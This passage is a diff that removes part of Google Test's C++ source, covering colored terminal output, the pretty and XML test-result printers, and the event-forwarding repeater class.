-  // corresponding source code location; otherwise they do nothing.
-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE
-  // We don't call OutputDebugString*() on Windows Mobile, as printing
-  // to stdout is done by OutputDebugString() there already - we don't
-  // want the same message printed twice.
-  ::OutputDebugStringA(result.c_str());
-  ::OutputDebugStringA("\n");
-#endif
-}
-
-// class PrettyUnitTestResultPrinter
-
-enum GTestColor {
-  COLOR_DEFAULT,
-  COLOR_RED,
-  COLOR_GREEN,
-  COLOR_YELLOW
-};
-
-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE && \
-    !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-
-// Returns the character attribute for the given color.
-WORD GetColorAttribute(GTestColor color) {
-  switch (color) {
-    case COLOR_RED:    return FOREGROUND_RED;
-    case COLOR_GREEN:  return FOREGROUND_GREEN;
-    case COLOR_YELLOW: return FOREGROUND_RED | FOREGROUND_GREEN;
-    default:           return 0;
-  }
-}
-
-#else
-
-// Returns the ANSI color code for the given color.  COLOR_DEFAULT is
-// an invalid input.
-const char* GetAnsiColorCode(GTestColor color) {
-  switch (color) {
-    case COLOR_RED:     return "1";
-    case COLOR_GREEN:   return "2";
-    case COLOR_YELLOW:  return "3";
-    default:            return NULL;
-  };
-}
-
-#endif  // GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE
-
-// Returns true iff Google Test should use colors in the output.
-bool ShouldUseColor(bool stdout_is_tty) {
-  const char* const gtest_color = GTEST_FLAG(color).c_str();
-
-  if (String::CaseInsensitiveCStringEquals(gtest_color, "auto")) {
-#if GTEST_OS_WINDOWS
-    // On Windows the TERM variable is usually not set, but the
-    // console there does support colors.
-    return stdout_is_tty;
-#else
-    // On non-Windows platforms, we rely on the TERM variable.
-    const char* const term = posix::GetEnv("TERM");
-    const bool term_supports_color =
-        String::CStringEquals(term, "xterm") ||
-        String::CStringEquals(term, "xterm-color") ||
-        String::CStringEquals(term, "xterm-256color") ||
-        String::CStringEquals(term, "screen") ||
-        String::CStringEquals(term, "screen-256color") ||
-        String::CStringEquals(term, "linux") ||
-        String::CStringEquals(term, "cygwin");
-    return stdout_is_tty && term_supports_color;
-#endif  // GTEST_OS_WINDOWS
-  }
-
-  return String::CaseInsensitiveCStringEquals(gtest_color, "yes") ||
-      String::CaseInsensitiveCStringEquals(gtest_color, "true") ||
-      String::CaseInsensitiveCStringEquals(gtest_color, "t") ||
-      String::CStringEquals(gtest_color, "1");
-  // We take "yes", "true", "t", and "1" as meaning "yes".  If the
-  // value is neither one of these nor "auto", we treat it as "no" to
-  // be conservative.
-}
-
-// Helpers for printing colored strings to stdout. Note that on Windows, we
-// cannot simply emit special characters and have the terminal change colors.
-// This routine must actually emit the characters rather than return a string
-// that would be colored when printed, as can be done on Linux.
-void ColoredPrintf(GTestColor color, const char* fmt, ...) {
-  va_list args;
-  va_start(args, fmt);
-
-#if GTEST_OS_WINDOWS_MOBILE || GTEST_OS_SYMBIAN || GTEST_OS_ZOS || \
-    GTEST_OS_IOS || GTEST_OS_WINDOWS_PHONE || GTEST_OS_WINDOWS_RT
-  const bool use_color = AlwaysFalse();
-#else
-  static const bool in_color_mode =
-      ShouldUseColor(posix::IsATTY(posix::FileNo(stdout)) != 0);
-  const bool use_color = in_color_mode && (color != COLOR_DEFAULT);
-#endif  // GTEST_OS_WINDOWS_MOBILE || GTEST_OS_SYMBIAN || GTEST_OS_ZOS
-  // The '!= 0' comparison is necessary to satisfy MSVC 7.1.
-
-  if (!use_color) {
-    vprintf(fmt, args);
-    va_end(args);
-    return;
-  }
-
-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE && \
-    !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-  const HANDLE stdout_handle = GetStdHandle(STD_OUTPUT_HANDLE);
-
-  // Gets the current text color.
-  CONSOLE_SCREEN_BUFFER_INFO buffer_info;
-  GetConsoleScreenBufferInfo(stdout_handle, &buffer_info);
-  const WORD old_color_attrs = buffer_info.wAttributes;
-
-  // We need to flush the stream buffers into the console before each
-  // SetConsoleTextAttribute call lest it affect the text that is already
-  // printed but has not yet reached the console.
-  fflush(stdout);
-  SetConsoleTextAttribute(stdout_handle,
-                          GetColorAttribute(color) | FOREGROUND_INTENSITY);
-  vprintf(fmt, args);
-
-  fflush(stdout);
-  // Restores the text color.
-  SetConsoleTextAttribute(stdout_handle, old_color_attrs);
-#else
-  printf("\033[0;3%sm", GetAnsiColorCode(color));
-  vprintf(fmt, args);
-  printf("\033[m");  // Resets the terminal to default.
-#endif  // GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_MOBILE
-  va_end(args);
-}
-
-// Text printed in Google Test's text output and --gunit_list_tests
-// output to label the type parameter and value parameter for a test.
-static const char kTypeParamLabel[] = "TypeParam";
-static const char kValueParamLabel[] = "GetParam()";
-
-void PrintFullTestCommentIfPresent(const TestInfo& test_info) {
-  const char* const type_param = test_info.type_param();
-  const char* const value_param = test_info.value_param();
-
-  if (type_param != NULL || value_param != NULL) {
-    printf(", where ");
-    if (type_param != NULL) {
-      printf("%s = %s", kTypeParamLabel, type_param);
-      if (value_param != NULL)
-        printf(" and ");
-    }
-    if (value_param != NULL) {
-      printf("%s = %s", kValueParamLabel, value_param);
-    }
-  }
-}
-
-// This class implements the TestEventListener interface.
-//
-// Class PrettyUnitTestResultPrinter is copyable.
-class PrettyUnitTestResultPrinter : public TestEventListener {
- public:
-  PrettyUnitTestResultPrinter() {}
-  static void PrintTestName(const char * test_case, const char * test) {
-    printf("%s.%s", test_case, test);
-  }
-
-  // The following methods override what's in the TestEventListener class.
-  virtual void OnTestProgramStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationStart(const UnitTest& unit_test, int iteration);
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestCaseStart(const TestCase& test_case);
-  virtual void OnTestStart(const TestInfo& test_info);
-  virtual void OnTestPartResult(const TestPartResult& result);
-  virtual void OnTestEnd(const TestInfo& test_info);
-  virtual void OnTestCaseEnd(const TestCase& test_case);
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationEnd(const UnitTest& unit_test, int iteration);
-  virtual void OnTestProgramEnd(const UnitTest& /*unit_test*/) {}
-
- private:
-  static void PrintFailedTests(const UnitTest& unit_test);
-};
-
-  // Fired before each iteration of tests starts.
-void PrettyUnitTestResultPrinter::OnTestIterationStart(
-    const UnitTest& unit_test, int iteration) {
-  if (GTEST_FLAG(repeat) != 1)
-    printf("\nRepeating all tests (iteration %d) . . .\n\n", iteration + 1);
-
-  const char* const filter = GTEST_FLAG(filter).c_str();
-
-  // Prints the filter if it's not *.  This reminds the user that some
-  // tests may be skipped.
-  if (!String::CStringEquals(filter, kUniversalFilter)) {
-    ColoredPrintf(COLOR_YELLOW,
-                  "Note: %s filter = %s\n", GTEST_NAME_, filter);
-  }
-
-  if (internal::ShouldShard(kTestTotalShards, kTestShardIndex, false)) {
-    const Int32 shard_index = Int32FromEnvOrDie(kTestShardIndex, -1);
-    ColoredPrintf(COLOR_YELLOW,
-                  "Note: This is test shard %d of %s.\n",
-                  static_cast<int>(shard_index) + 1,
-                  internal::posix::GetEnv(kTestTotalShards));
-  }
-
-  if (GTEST_FLAG(shuffle)) {
-    ColoredPrintf(COLOR_YELLOW,
-                  "Note: Randomizing tests' orders with a seed of %d .\n",
-                  unit_test.random_seed());
-  }
-
-  ColoredPrintf(COLOR_GREEN,  "[==========] ");
-  printf("Running %s from %s.\n",
-         FormatTestCount(unit_test.test_to_run_count()).c_str(),
-         FormatTestCaseCount(unit_test.test_case_to_run_count()).c_str());
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnEnvironmentsSetUpStart(
-    const UnitTest& /*unit_test*/) {
-  ColoredPrintf(COLOR_GREEN,  "[----------] ");
-  printf("Global test environment set-up.\n");
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestCaseStart(const TestCase& test_case) {
-  const std::string counts =
-      FormatCountableNoun(test_case.test_to_run_count(), "test", "tests");
-  ColoredPrintf(COLOR_GREEN, "[----------] ");
-  printf("%s from %s", counts.c_str(), test_case.name());
-  if (test_case.type_param() == NULL) {
-    printf("\n");
-  } else {
-    printf(", where %s = %s\n", kTypeParamLabel, test_case.type_param());
-  }
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestStart(const TestInfo& test_info) {
-  ColoredPrintf(COLOR_GREEN,  "[ RUN      ] ");
-  PrintTestName(test_info.test_case_name(), test_info.name());
-  printf("\n");
-  fflush(stdout);
-}
-
-// Called after an assertion failure.
-void PrettyUnitTestResultPrinter::OnTestPartResult(
-    const TestPartResult& result) {
-  // If the test part succeeded, we don't need to do anything.
-  if (result.type() == TestPartResult::kSuccess)
-    return;
-
-  // Print failure message from the assertion (e.g. expected this and got that).
-  PrintTestPartResult(result);
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestEnd(const TestInfo& test_info) {
-  if (test_info.result()->Passed()) {
-    ColoredPrintf(COLOR_GREEN, "[       OK ] ");
-  } else {
-    ColoredPrintf(COLOR_RED, "[  FAILED  ] ");
-  }
-  PrintTestName(test_info.test_case_name(), test_info.name());
-  if (test_info.result()->Failed())
-    PrintFullTestCommentIfPresent(test_info);
-
-  if (GTEST_FLAG(print_time)) {
-    printf(" (%s ms)\n", internal::StreamableToString(
-           test_info.result()->elapsed_time()).c_str());
-  } else {
-    printf("\n");
-  }
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnTestCaseEnd(const TestCase& test_case) {
-  if (!GTEST_FLAG(print_time)) return;
-
-  const std::string counts =
-      FormatCountableNoun(test_case.test_to_run_count(), "test", "tests");
-  ColoredPrintf(COLOR_GREEN, "[----------] ");
-  printf("%s from %s (%s ms total)\n\n",
-         counts.c_str(), test_case.name(),
-         internal::StreamableToString(test_case.elapsed_time()).c_str());
-  fflush(stdout);
-}
-
-void PrettyUnitTestResultPrinter::OnEnvironmentsTearDownStart(
-    const UnitTest& /*unit_test*/) {
-  ColoredPrintf(COLOR_GREEN,  "[----------] ");
-  printf("Global test environment tear-down\n");
-  fflush(stdout);
-}
-
-// Internal helper for printing the list of failed tests.
-void PrettyUnitTestResultPrinter::PrintFailedTests(const UnitTest& unit_test) {
-  const int failed_test_count = unit_test.failed_test_count();
-  if (failed_test_count == 0) {
-    return;
-  }
-
-  for (int i = 0; i < unit_test.total_test_case_count(); ++i) {
-    const TestCase& test_case = *unit_test.GetTestCase(i);
-    if (!test_case.should_run() || (test_case.failed_test_count() == 0)) {
-      continue;
-    }
-    for (int j = 0; j < test_case.total_test_count(); ++j) {
-      const TestInfo& test_info = *test_case.GetTestInfo(j);
-      if (!test_info.should_run() || test_info.result()->Passed()) {
-        continue;
-      }
-      ColoredPrintf(COLOR_RED, "[  FAILED  ] ");
-      printf("%s.%s", test_case.name(), test_info.name());
-      PrintFullTestCommentIfPresent(test_info);
-      printf("\n");
-    }
-  }
-}
-
-void PrettyUnitTestResultPrinter::OnTestIterationEnd(const UnitTest& unit_test,
-                                                     int /*iteration*/) {
-  ColoredPrintf(COLOR_GREEN,  "[==========] ");
-  printf("%s from %s ran.",
-         FormatTestCount(unit_test.test_to_run_count()).c_str(),
-         FormatTestCaseCount(unit_test.test_case_to_run_count()).c_str());
-  if (GTEST_FLAG(print_time)) {
-    printf(" (%s ms total)",
-           internal::StreamableToString(unit_test.elapsed_time()).c_str());
-  }
-  printf("\n");
-  ColoredPrintf(COLOR_GREEN,  "[  PASSED  ] ");
-  printf("%s.\n", FormatTestCount(unit_test.successful_test_count()).c_str());
-
-  int num_failures = unit_test.failed_test_count();
-  if (!unit_test.Passed()) {
-    const int failed_test_count = unit_test.failed_test_count();
-    ColoredPrintf(COLOR_RED,  "[  FAILED  ] ");
-    printf("%s, listed below:\n", FormatTestCount(failed_test_count).c_str());
-    PrintFailedTests(unit_test);
-    printf("\n%2d FAILED %s\n", num_failures,
-                        num_failures == 1 ? "TEST" : "TESTS");
-  }
-
-  int num_disabled = unit_test.reportable_disabled_test_count();
-  if (num_disabled && !GTEST_FLAG(also_run_disabled_tests)) {
-    if (!num_failures) {
-      printf("\n");  // Add a spacer if no FAILURE banner is displayed.
-    }
-    ColoredPrintf(COLOR_YELLOW,
-                  "  YOU HAVE %d DISABLED %s\n\n",
-                  num_disabled,
-                  num_disabled == 1 ? "TEST" : "TESTS");
-  }
-  // Ensure that Google Test output is printed before, e.g., heapchecker output.
-  fflush(stdout);
-}
-
-// End PrettyUnitTestResultPrinter
-
-// class TestEventRepeater
-//
-// This class forwards events to other event listeners.
-class TestEventRepeater : public TestEventListener {
- public:
-  TestEventRepeater() : forwarding_enabled_(true) {}
-  virtual ~TestEventRepeater();
-  void Append(TestEventListener *listener);
-  TestEventListener* Release(TestEventListener* listener);
-
-  // Controls whether events will be forwarded to listeners_. Set to false
-  // in death test child processes.
-  bool forwarding_enabled() const { return forwarding_enabled_; }
-  void set_forwarding_enabled(bool enable) { forwarding_enabled_ = enable; }
-
-  virtual void OnTestProgramStart(const UnitTest& unit_test);
-  virtual void OnTestIterationStart(const UnitTest& unit_test, int iteration);
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& unit_test);
-  virtual void OnTestCaseStart(const TestCase& test_case);
-  virtual void OnTestStart(const TestInfo& test_info);
-  virtual void OnTestPartResult(const TestPartResult& result);
-  virtual void OnTestEnd(const TestInfo& test_info);
-  virtual void OnTestCaseEnd(const TestCase& test_case);
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& unit_test);
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& unit_test);
-  virtual void OnTestIterationEnd(const UnitTest& unit_test, int iteration);
-  virtual void OnTestProgramEnd(const UnitTest& unit_test);
-
- private:
-  // Controls whether events will be forwarded to listeners_. Set to false
-  // in death test child processes.
-  bool forwarding_enabled_;
-  // The list of listeners that receive events.
-  std::vector<TestEventListener*> listeners_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestEventRepeater);
-};
-
-TestEventRepeater::~TestEventRepeater() {
-  ForEach(listeners_, Delete<TestEventListener>);
-}
-
-void TestEventRepeater::Append(TestEventListener *listener) {
-  listeners_.push_back(listener);
-}
-
-// TODO(vladl@google.com): Factor the search functionality into Vector::Find.
-TestEventListener* TestEventRepeater::Release(TestEventListener *listener) {
-  for (size_t i = 0; i < listeners_.size(); ++i) {
-    if (listeners_[i] == listener) {
-      listeners_.erase(listeners_.begin() + i);
-      return listener;
-    }
-  }
-
-  return NULL;
-}
-
-// Since most methods are very similar, use macros to reduce boilerplate.
-// This defines a member that forwards the call to all listeners.
-#define GTEST_REPEATER_METHOD_(Name, Type) \
-void TestEventRepeater::Name(const Type& parameter) { \
-  if (forwarding_enabled_) { \
-    for (size_t i = 0; i < listeners_.size(); i++) { \
-      listeners_[i]->Name(parameter); \
-    } \
-  } \
-}
-// This defines a member that forwards the call to all listeners in reverse
-// order.
-#define GTEST_REVERSE_REPEATER_METHOD_(Name, Type) \
-void TestEventRepeater::Name(const Type& parameter) { \
-  if (forwarding_enabled_) { \
-    for (int i = static_cast<int>(listeners_.size()) - 1; i >= 0; i--) { \
-      listeners_[i]->Name(parameter); \
-    } \
-  } \
-}
-
-GTEST_REPEATER_METHOD_(OnTestProgramStart, UnitTest)
-GTEST_REPEATER_METHOD_(OnEnvironmentsSetUpStart, UnitTest)
-GTEST_REPEATER_METHOD_(OnTestCaseStart, TestCase)
-GTEST_REPEATER_METHOD_(OnTestStart, TestInfo)
-GTEST_REPEATER_METHOD_(OnTestPartResult, TestPartResult)
-GTEST_REPEATER_METHOD_(OnEnvironmentsTearDownStart, UnitTest)
-GTEST_REVERSE_REPEATER_METHOD_(OnEnvironmentsSetUpEnd, UnitTest)
-GTEST_REVERSE_REPEATER_METHOD_(OnEnvironmentsTearDownEnd, UnitTest)
-GTEST_REVERSE_REPEATER_METHOD_(OnTestEnd, TestInfo)
-GTEST_REVERSE_REPEATER_METHOD_(OnTestCaseEnd, TestCase)
-GTEST_REVERSE_REPEATER_METHOD_(OnTestProgramEnd, UnitTest)
-
-#undef GTEST_REPEATER_METHOD_
-#undef GTEST_REVERSE_REPEATER_METHOD_
-
-void TestEventRepeater::OnTestIterationStart(const UnitTest& unit_test,
-                                             int iteration) {
-  if (forwarding_enabled_) {
-    for (size_t i = 0; i < listeners_.size(); i++) {
-      listeners_[i]->OnTestIterationStart(unit_test, iteration);
-    }
-  }
-}
-
-void TestEventRepeater::OnTestIterationEnd(const UnitTest& unit_test,
-                                           int iteration) {
-  if (forwarding_enabled_) {
-    for (int i = static_cast<int>(listeners_.size()) - 1; i >= 0; i--) {
-      listeners_[i]->OnTestIterationEnd(unit_test, iteration);
-    }
-  }
-}
-
-// End TestEventRepeater
-
-// This class generates an XML output file.
-class XmlUnitTestResultPrinter : public EmptyTestEventListener {
- public:
-  explicit XmlUnitTestResultPrinter(const char* output_file);
-
-  virtual void OnTestIterationEnd(const UnitTest& unit_test, int iteration);
-
- private:
-  // Is c a whitespace character that is normalized to a space character
-  // when it appears in an XML attribute value?
-  static bool IsNormalizableWhitespace(char c) {
-    return c == 0x9 || c == 0xA || c == 0xD;
-  }
-
-  // May c appear in a well-formed XML document?
-  static bool IsValidXmlCharacter(char c) {
-    return IsNormalizableWhitespace(c) || c >= 0x20;
-  }
-
-  // Returns an XML-escaped copy of the input string str.  If
-  // is_attribute is true, the text is meant to appear as an attribute
-  // value, and normalizable whitespace is preserved by replacing it
-  // with character references.
-  static std::string EscapeXml(const std::string& str, bool is_attribute);
-
-  // Returns the given string with all characters invalid in XML removed.
-  static std::string RemoveInvalidXmlCharacters(const std::string& str);
-
-  // Convenience wrapper around EscapeXml when str is an attribute value.
-  static std::string EscapeXmlAttribute(const std::string& str) {
-    return EscapeXml(str, true);
-  }
-
-  // Convenience wrapper around EscapeXml when str is not an attribute value.
-  static std::string EscapeXmlText(const char* str) {
-    return EscapeXml(str, false);
-  }
-
-  // Verifies that the given attribute belongs to the given element and
-  // streams the attribute as XML.
-  static void OutputXmlAttribute(std::ostream* stream,
-                                 const std::string& element_name,
-                                 const std::string& name,
-                                 const std::string& value);
-
-  // Streams an XML CDATA section, escaping invalid CDATA sequences as needed.
-  static void OutputXmlCDataSection(::std::ostream* stream, const char* data);
-
-  // Streams an XML representation of a TestInfo object.
-  static void OutputXmlTestInfo(::std::ostream* stream,
-                                const char* test_case_name,
-                                const TestInfo& test_info);
-
-  // Prints an XML representation of a TestCase object
-  static void PrintXmlTestCase(::std::ostream* stream,
-                               const TestCase& test_case);
-
-  // Prints an XML summary of unit_test to output stream out.
-  static void PrintXmlUnitTest(::std::ostream* stream,
-                               const UnitTest& unit_test);
-
-  // Produces a string representing the test properties in a result as space
-  // delimited XML attributes based on the property key="value" pairs.
-  // When the std::string is not empty, it includes a space at the beginning,
-  // to delimit this attribute from prior attributes.
-  static std::string TestPropertiesAsXmlAttributes(const TestResult& result);
-
-  // The output file.
-  const std::string output_file_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(XmlUnitTestResultPrinter);
-};
-
-// Creates a new XmlUnitTestResultPrinter.
-XmlUnitTestResultPrinter::XmlUnitTestResultPrinter(const char* output_file)
-    : output_file_(output_file) {
-  if (output_file_.c_str() == NULL || output_file_.empty()) {
-    fprintf(stderr, "XML output file may not be null\n");
-    fflush(stderr);
-    exit(EXIT_FAILURE);
-  }
-}
-
-// Called after the unit test ends.
-void XmlUnitTestResultPrinter::OnTestIterationEnd(const UnitTest& unit_test,
-                                                  int /*iteration*/) {
-  FILE* xmlout = NULL;
-  FilePath output_file(output_file_);
-  FilePath output_dir(output_file.RemoveFileName());
-
-  if (output_dir.CreateDirectoriesRecursively()) {
-    xmlout = posix::FOpen(output_file_.c_str(), "w");
-  }
-  if (xmlout == NULL) {
-    // TODO(wan): report the reason of the failure.
-    //
-    // We don't do it for now as:
-    //
-    //   1. There is no urgent need for it.
-    //   2. It's a bit involved to make the errno variable thread-safe on
-    //      all three operating systems (Linux, Windows, and Mac OS).
-    //   3. To interpret the meaning of errno in a thread-safe way,
-    //      we need the strerror_r() function, which is not available on
-    //      Windows.
-    fprintf(stderr,
-            "Unable to open file \"%s\"\n",
-            output_file_.c_str());
-    fflush(stderr);
-    exit(EXIT_FAILURE);
-  }
-  std::stringstream stream;
-  PrintXmlUnitTest(&stream, unit_test);
-  fprintf(xmlout, "%s", StringStreamToString(&stream).c_str());
-  fclose(xmlout);
-}
-
-// Returns an XML-escaped copy of the input string str.  If is_attribute
-// is true, the text is meant to appear as an attribute value, and
-// normalizable whitespace is preserved by replacing it with character
-// references.
-//
-// Invalid XML characters in str, if any, are stripped from the output.
-// It is expected that most, if not all, of the text processed by this
-// module will consist of ordinary English text.
-// If this module is ever modified to produce version 1.1 XML output,
-// most invalid characters can be retained using character references.
-// TODO(wan): It might be nice to have a minimally invasive, human-readable
-// escaping scheme for invalid characters, rather than dropping them.
-std::string XmlUnitTestResultPrinter::EscapeXml(
-    const std::string& str, bool is_attribute) {
-  Message m;
-
-  for (size_t i = 0; i < str.size(); ++i) {
-    const char ch = str[i];
-    switch (ch) {
-      case '<':
-        m << "&lt;";
-        break;
-      case '>':
-        m << "&gt;";
-        break;
-      case '&':
-        m << "&amp;";
-        break;
-      case '\'':
-        if (is_attribute)
-          m << "&apos;";
-        else
-          m << '\'';
-        break;
-      case '"':
-        if (is_attribute)
-          m << "&quot;";
-        else
-          m << '"';
-        break;
-      default:
-        if (IsValidXmlCharacter(ch)) {
-          if (is_attribute && IsNormalizableWhitespace(ch))
-            m << "&#x" << String::FormatByte(static_cast<unsigned char>(ch))
-              << ";";
-          else
-            m << ch;
-        }
-        break;
-    }
-  }
-
-  return m.GetString();
-}
-
-// Returns the given string with all characters invalid in XML removed.
-// Currently invalid characters are dropped from the string. An
-// alternative is to replace them with certain characters such as . or ?.
-std::string XmlUnitTestResultPrinter::RemoveInvalidXmlCharacters(
-    const std::string& str) {
-  std::string output;
-  output.reserve(str.size());
-  for (std::string::const_iterator it = str.begin(); it != str.end(); ++it)
-    if (IsValidXmlCharacter(*it))
-      output.push_back(*it);
-
-  return output;
-}
-
-// The following routines generate an XML representation of a UnitTest
-// object.
-//
-// This is how Google Test concepts map to the DTD:
-//
-// <testsuites name="AllTests">        <-- corresponds to a UnitTest object
-//   <testsuite name="testcase-name">  <-- corresponds to a TestCase object
-//     <testcase name="test-name">     <-- corresponds to a TestInfo object
-//       <failure message="...">...</failure>
-//       <failure message="...">...</failure>
-//       <failure message="...">...</failure>
-//                                     <-- individual assertion failures
-//     </testcase>
-//   </testsuite>
-// </testsuites>
-
-// Formats the given time in milliseconds as seconds.
-std::string FormatTimeInMillisAsSeconds(TimeInMillis ms) {
-  ::std::stringstream ss;
-  ss << ms/1000.0;
-  return ss.str();
-}
-
-static bool PortableLocaltime(time_t seconds, struct tm* out) {
-#if defined(_MSC_VER)
-  return localtime_s(out, &seconds) == 0;
-#elif defined(__MINGW32__) || defined(__MINGW64__)
-  // MINGW <time.h> provides neither localtime_r nor localtime_s, but uses
-  // Windows' localtime(), which has a thread-local tm buffer.
-  struct tm* tm_ptr = localtime(&seconds);  // NOLINT
-  if (tm_ptr == NULL)
-    return false;
-  *out = *tm_ptr;
-  return true;
-#else
-  return localtime_r(&seconds, out) != NULL;
-#endif
-}
-
-// Converts the given epoch time in milliseconds to a date string in the ISO
-// 8601 format, without the timezone information.
-std::string FormatEpochTimeInMillisAsIso8601(TimeInMillis ms) {
-  struct tm time_struct;
-  if (!PortableLocaltime(static_cast<time_t>(ms / 1000), &time_struct))
-    return "";
-  // YYYY-MM-DDThh:mm:ss
-  return StreamableToString(time_struct.tm_year + 1900) + "-" +
-      String::FormatIntWidth2(time_struct.tm_mon + 1) + "-" +
-      String::FormatIntWidth2(time_struct.tm_mday) + "T" +
-      String::FormatIntWidth2(time_struct.tm_hour) + ":" +
-      String::FormatIntWidth2(time_struct.tm_min) + ":" +
-      String::FormatIntWidth2(time_struct.tm_sec);
-}
-
-// Streams an XML CDATA section, escaping invalid CDATA sequences as needed.
-void XmlUnitTestResultPrinter::OutputXmlCDataSection(::std::ostream* stream,
-                                                     const char* data) {
-  const char* segment = data;
-  *stream << "<![CDATA[";
-  for (;;) {
-    const char* const next_segment = strstr(segment, "]]>");
-    if (next_segment != NULL) {
-      stream->write(
-          segment, static_cast<std::streamsize>(next_segment - segment));
-      *stream << "]]>]]&gt;<![CDATA[";
-      segment = next_segment + strlen("]]>");
-    } else {
-      *stream << segment;
-      break;
-    }
-  }
-  *stream << "]]>";
-}
-
-void XmlUnitTestResultPrinter::OutputXmlAttribute(
-    std::ostream* stream,
-    const std::string& element_name,
-    const std::string& name,
-    const std::string& value) {
-  const std::vector<std::string>& allowed_names =
-      GetReservedAttributesForElement(element_name);
-
-  GTEST_CHECK_(std::find(allowed_names.begin(), allowed_names.end(), name) !=
-                   allowed_names.end())
-      << "Attribute " << name << " is not allowed for element <" << element_name
-      << ">.";
-
-  *stream << " " << name << "=\"" << EscapeXmlAttribute(value) << "\"";
-}
-
-// Prints an XML representation of a TestInfo object.
-// TODO(wan): There is also value in printing properties with the plain printer.
-void XmlUnitTestResultPrinter::OutputXmlTestInfo(::std::ostream* stream,
-                                                 const char* test_case_name,
-                                                 const TestInfo& test_info) {
-  const TestResult& result = *test_info.result();
-  const std::string kTestcase = "testcase";
-
-  *stream << "    <testcase";
-  OutputXmlAttribute(stream, kTestcase, "name", test_info.name());
-
-  if (test_info.value_param() != NULL) {
-    OutputXmlAttribute(stream, kTestcase, "value_param",
-                       test_info.value_param());
-  }
-  if (test_info.type_param() != NULL) {
-    OutputXmlAttribute(stream, kTestcase, "type_param", test_info.type_param());
-  }
-
-  OutputXmlAttribute(stream, kTestcase, "status",
-                     test_info.should_run() ? "run" : "notrun");
-  OutputXmlAttribute(stream, kTestcase, "time",
-                     FormatTimeInMillisAsSeconds(result.elapsed_time()));
-  OutputXmlAttribute(stream, kTestcase, "classname", test_case_name);
-  *stream << TestPropertiesAsXmlAttributes(result);
-
-  int failures = 0;
-  for (int i = 0; i < result.total_part_count(); ++i) {
-    const TestPartResult& part = result.GetTestPartResult(i);
-    if (part.failed()) {
-      if (++failures == 1) {
-        *stream << ">\n";
-      }
-      const string location = internal::FormatCompilerIndependentFileLocation(
-          part.file_name(), part.line_number());
-      const string summary = location + "\n" + part.summary();
-      *stream << "      <failure message=\""
-              << EscapeXmlAttribute(summary.c_str())
-              << "\" type=\"\">";
-      const string detail = location + "\n" + part.message();
-      OutputXmlCDataSection(stream, RemoveInvalidXmlCharacters(detail).c_str());
-      *stream << "</failure>\n";
-    }
-  }
-
-  if (failures == 0)
-    *stream << " />\n";
-  else
-    *stream << "    </testcase>\n";
-}
-
-// Prints an XML representation of a TestCase object
-void XmlUnitTestResultPrinter::PrintXmlTestCase(std::ostream* stream,
-                                                const TestCase& test_case) {
-  const std::string kTestsuite = "testsuite";
-  *stream << "  <" << kTestsuite;
-  OutputXmlAttribute(stream, kTestsuite, "name", test_case.name());
-  OutputXmlAttribute(stream, kTestsuite, "tests",
-                     StreamableToString(test_case.reportable_test_count()));
-  OutputXmlAttribute(stream, kTestsuite, "failures",
-                     StreamableToString(test_case.failed_test_count()));
-  OutputXmlAttribute(
-      stream, kTestsuite, "disabled",
-      StreamableToString(test_case.reportable_disabled_test_count()));
-  OutputXmlAttribute(stream, kTestsuite, "errors", "0");
-  OutputXmlAttribute(stream, kTestsuite, "time",
-                     FormatTimeInMillisAsSeconds(test_case.elapsed_time()));
-  *stream << TestPropertiesAsXmlAttributes(test_case.ad_hoc_test_result())
-          << ">\n";
-
-  for (int i = 0; i < test_case.total_test_count(); ++i) {
-    if (test_case.GetTestInfo(i)->is_reportable())
-      OutputXmlTestInfo(stream, test_case.name(), *test_case.GetTestInfo(i));
-  }
-  *stream << "  </" << kTestsuite << ">\n";
-}
-
-// Prints an XML summary of unit_test to output stream out.
-void XmlUnitTestResultPrinter::PrintXmlUnitTest(std::ostream* stream,
-                                                const UnitTest& unit_test) {
-  const std::string kTestsuites = "testsuites";
-
-  *stream << "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
-  *stream << "<" << kTestsuites;
-
-  OutputXmlAttribute(stream, kTestsuites, "tests",
-                     StreamableToString(unit_test.reportable_test_count()));
-  OutputXmlAttribute(stream, kTestsuites, "failures",
-                     StreamableToString(unit_test.failed_test_count()));
-  OutputXmlAttribute(
-      stream, kTestsuites, "disabled",
-      StreamableToString(unit_test.reportable_disabled_test_count()));
-  OutputXmlAttribute(stream, kTestsuites, "errors", "0");
-  OutputXmlAttribute(
-      stream, kTestsuites, "timestamp",
-      FormatEpochTimeInMillisAsIso8601(unit_test.start_timestamp()));
-  OutputXmlAttribute(stream, kTestsuites, "time",
-                     FormatTimeInMillisAsSeconds(unit_test.elapsed_time()));
-
-  if (GTEST_FLAG(shuffle)) {
-    OutputXmlAttribute(stream, kTestsuites, "random_seed",
-                       StreamableToString(unit_test.random_seed()));
-  }
-
-  *stream << TestPropertiesAsXmlAttributes(unit_test.ad_hoc_test_result());
-
-  OutputXmlAttribute(stream, kTestsuites, "name", "AllTests");
-  *stream << ">\n";
-
-  for (int i = 0; i < unit_test.total_test_case_count(); ++i) {
